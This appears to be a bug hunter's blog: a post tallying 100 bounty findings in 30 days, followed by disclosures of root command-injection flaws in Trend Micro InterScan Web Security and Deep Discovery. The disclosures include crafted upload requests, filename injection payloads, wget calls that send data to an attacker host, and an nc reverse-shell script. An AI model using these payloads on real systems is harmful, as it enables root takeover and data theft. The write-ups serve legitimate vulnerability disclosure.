100 Bugs in 30 Days

Being a part time bug/bounty hunter, I was doing a little reading and was inspired by Shubham Shah who posted about his efforts to get 120 Bounties in 120 days.  I came across this article quite some time ago, and it has weighed heavily ever since.  Ultimately I decided to follow suite with a slightly more realistic goal of 100 bugs in a YEAR.  After all, I bug hunt on the weekends and evenings.  I can’t go full time, so a year seemed much more realistic.

Oh, but I can hear you saying, “WTF Korr, this post says 100 bugs in 30 days!  You canz no counterz! lolz”.  First off, stop talking like that, it’s extremely annoying.  Second, that’s no typo.  So here is what happened.  I started my 100 bugs in a year journey on november 20th.  It was a strong start with 3 bugs in the first day.  Then something magical happened.  My voice started cracking, and hair started grow…oop, wrong kind of magical.  The important thing that happened was twofold.  First, a HUGE program opened on the 20th (yes, same day).  I started shaking and dove right into the massive scope.  If you are involved with this particular program, then you know both just how massive the scope really is, and why I am hesitant to identify it.  Though I think there may be a hint somewhere in this post…  But getting in on the first floor for the new program wasn’t the only alignment in the stars.  A little over a week later, on the 30th, I received an invite to a private program.  I can’t disclose which yet, but the number of invited hackers seems to be a relatively small number, leaving competition rather sparse.

Getting in day one on both of these was massive.  However, I was still at a disadvantage because of the need to work nights/weekends.  But, diligence has paid off.  My eyes hurt, I am sleep deprived, and my brain feels like a shaken bowl of hot pudding.  But I got a large number of bugs in a short period of time.  As I write this, I have not been green lit to disclose details about my bugs.  Nor will I until given permission.  I am not allowed to give much information, but metrics are not listed as off limits, especially if I combine programs so as to further obfuscate the origins.  Which means I can at least combine all my bug findings across all the programs, and give a little bit of useful data about my experience.  I will not say which programs resulted in what findings, but will give a little insight into how many bugs per day, frequency of certain vulnerability types, etc.  Ideally, the disclosures will come very soon.

The first and easiest metric.  100 bugs in 30 days.  Or 3.3333 bugs per day.  Some days I had 0 bugs, others I saw a spike of 10 or more.

Considering this is a race for bugs, I am not ashamed to say I had a rather large quantity of Lows.  So be it.  A risk is a risk.  If they are worth points and/or money, I’m reporting them.  So clearly, this is not a case of 100 RCE vulnerabilities, though there were a few of those 😉  So judge me not, lest ye can do better, and if ye can, mentor my simple ass.

So without further ado, here are a list of bugs by vuln type, in order of frequency (it’s important to note that some of the reports were for ‘multiple instances’, but I am only counting the reports):

  • XSS – 41
  • Error Message/Info Disclosure  – 19
  • HTML Injection – 11
  • SQL Injection – 6
  • Authentication Flaws/Bypass – 5
  • Unchecked Redirect – 5
  • CSRF – 4
  • Weak/Default Credentials – 2
  • User Enumeration – 2
  • Misc – 5

NOTE: Misc includes Subdomain Hijack, Insecure Direct Object Reference, External Service Interaction, AV Signature Bypass, and a known RCE vuln

Now for the big question I was dying to know. What is the market value of these bugs?  Given other projects of similar scope (Google and Facebook), here is the estimate (based on publicly disclosed monetary awards and bounty program pages):

Google – $285,000 (rough estimate)

Facebook – Tougher to estimate, but placing the amount smaller than Google at about $160,000

So these are rather unrealistic in the sense that these programs are currently demolished and this number of bugs is rather unlikely at the moment.  But what about HackerOne’s own estimates?  They estimate values as listed below:

  • Low
    • Median – 100
    • Competitive – 250
    • Top – 500
  • Medium
    • Median – 150
    • Competitive – 600
    • Top – 1500
  • High
    • Median – 500
    • Competitive -2500
    • Top – 4000
  • Critical
    • Median – 1400
    • Competitive – 9000
    • Top – 15000

Using these values, the HackerOne Median worth is roughly $22,000.  Using a rough 6x value to derive the Top value (because I’m tired of writing this post), I would be looking at $132,000 for Top values.  Or a 4x multiple for Competitive, coming to 88,000.

Sad panda

No matter how I look at the numbers, that’s a solid 5 figures worth of bugs….that I won’t be getting paid for….

Yes, that’s right, no money.  Well, almost none.  I anticipate a couple grand from the private program.  But all the other programs were for points and/or swag.  And even then, the points system was completely screwed up (I will discuss this soon…).  So I will be walking away with a boost in rankings only.

To top it off, I will be posting a rant about the short falls of a poorly implemented bug bounty platform.  Get ready, I’m about to bite the hand that feeds me.  But for now.  I’m just going to revel in what I accomplished in a month.  I’m happy.  That’s good for now.

Also important to note, I’m still working on the massive…OMFG sized scope program.  I only get points (biting my lip as to why that’s an extra bad rub – more on this later), but those help get invites right?  That’s what I’m told….but I now have my doubts.  Serious doubts.

Multiple Vulnerabilities – Trend Micro Control Manager 6.0

The following are publicly disclosed vulnerabilities I discovered with TrendMicro Control Manager 6.0

Full details of the vulnerabilities have not been agreed upon for disclosure, so this is more for record keeping than anything else.  Please do not inquire for details as there is no agreement in place for me to divulge any.  As much as I would love to discuss and help, I prefer staying out of jail much more 🙂

  • ZDI-CAN-3634 – Closed without public disclosure (unknown reasoning as it was/is a valid finding)

SQL Injection with RCE:

XXE:

XPATH Injection:

ZDI-16-348: Trend Micro InterScan Web Security ManagePatches filename Remote Code Execution Vulnerability

Version: IWSVA65sp2

Summary:

The com.trend.iwss.gui.servlet.ManagePatches servlet contains a flaw allowing any authenticated user (including ‘Report Only’ users) to execute commands under the context of the root user.

Details:

The com.trend.iwss.gui.servlet.ManagePatches servlet is used by elevated privilege users to upload files (patches). The functionality, however, can be used by any authenticated user simply by substituting their cookie into the request (below is a sample of the stripped down valid request).

POST /servlet/com.trend.iwss.gui.servlet.ManagePatches?action=upload HTTP/1.1
Host: <server IP>:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<server IP>:8443/admin_patch_mgmt2.jsp?CSRFGuardToken=MQG8WJXIT4J8GASYYA7OVCXXBKUIGG5D
Cookie: JSESSIONID=<INSERT COOKIE VALUE HERE>
Connection: close
Content-Type: multipart/form-data; boundary=—————————141658507810329061771972399818
Content-Length: 259

—————————–141658507810329061771972399818
Content-Disposition: form-data; name=”patchFileName”; filename=”test.xml”
Content-Type: text/xml

—————————–141658507810329061771972399818–

The actual injection takes place in the name of the file being uploaded. By performing the following tests, the delay in responses indicates that command execution is occurring.

Initial test:

—————————–141658507810329061771972399818
Content-Disposition: form-data; name=”patchFileName”; filename=”test.xml&ping 127.0.0.1 -c 10″
Content-Type: text/xml

Secondary test:

—————————–141658507810329061771972399818
Content-Disposition: form-data; name=”patchFileName”; filename=”test.xml&ping 127.0.0.1 -c 30″
Content-Type: text/xml

This gives any user the ability to execute simple non interactive commands. However, more complex (including remote shell) are possible.

By issuing a ‘wget <ip>’ of the attacker machine, a response is seen. However, exfiltrating information a bit more tricky. Special characters like ‘/’,'<‘,’>’ are not sent across to the server. But utilizing the environment itself, it becomes possible to insert characters like the ‘/’. Below is an example of a user running a wget to retrieve the current user using the given command (where [ip address] is your receiving machine):

Command –

filename=”test.xml&wget `echo [ip address]“echo $PATH | cut -c1“id`”

EXPLANATION: using ` (or even $()) to escape, it is possible to pull the ‘/’ character from the current $PATH and insert it into the command, creating the full wget of [ip address]/`id`

Apache Log –

4

This grants the ability to exfiltrate some data, as well as upload (via wget) files.

Now the attacker has the ability to create a shell by uploading a file containing the following:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip address] 5555 >/tmp/f

To upload the file, the attacker simply names this file to shell, then uploads using this vulnerability and wget:

test.xml&wget `echo [ip address]“echo $PATH | cut -c1`shell

Once the file has been uploaded (will be placed in the /var/iwss/patch/bin folder), the attacker can chmod and then execute the file as a script, creating a reverse shell, running as root:

test.xml&chmod a+x shell

test.xml&.`echo $PATH | cut -c1`shell

5

CVE-2016-5840: Trend Micro Deep Discovery hotfix_upload.cgi filename Remote Code Execution Vulnerability

Version: TDA 2.6.1062r1

Summary:

The hotfix_upload.cgi file contains a flaw allowing a user to execute commands under the context of the root user.

Details:

The hotfix_upload.cgi file is used to upload files (hot fixes). Below is a sample of the upload function being used:

POST /cgi-bin/hotfix_upload.cgi?sID=hotfix_temp HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://<server IP>/cgi-bin/hotfix_history.cgi
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: multipart/form-data; boundary=—————————7e0823930136
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: <server IP>
Content-Length: 206
Connection: close
Cache-Control: no-cache
Cookie: session_id=

—————————–7e0823930136
Content-Disposition: form-data; name=”ajaxuploader_file”; filename=”test.txt”
Content-Type: text/plain

a
—————————–7e0823930136–

The actual injection takes place in the name of the file being uploaded (ie. filename=”test.txt&id”). By performing the following request, system information is sent back in the response:

1

This gives any user the ability to execute simple non interactive commands. However, more complex (including remote shell) commands are possible.

Special characters like ‘/’,'<‘,’>’ are not sent across to the server. But utilizing the environment itself, it becomes possible to insert characters like the ‘/’. Below is an example of a user using this method to retrieve the /etc/passwd file (NOTE: `echo $PATH | cut -c1` will print ‘/‘ to the final command):

2

Now the attacker has the ability to create a shell by uploading a file containing the following (where [ip address] is your receiving machine):

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip address] 5555 >/tmp/f

To upload the file, the attacker simply names this file to shell, then uploads using this vulnerability and wget:

test.txt&wget http:`echo $PATH | cut -c1“echo $PATH | cut -c1`[ip]`echo $PATH | cut -c1`shell

Once the file has been uploaded (it will be placed in /opt/TrendMicro/MinorityReport/www/cgi-bin), the attacker can chmod and then execute the file as a script, creating a reverse shell, running as root:

test.xml&chmod a+x shell

test.xml&.`echo $PATH | cut -c1`shell

3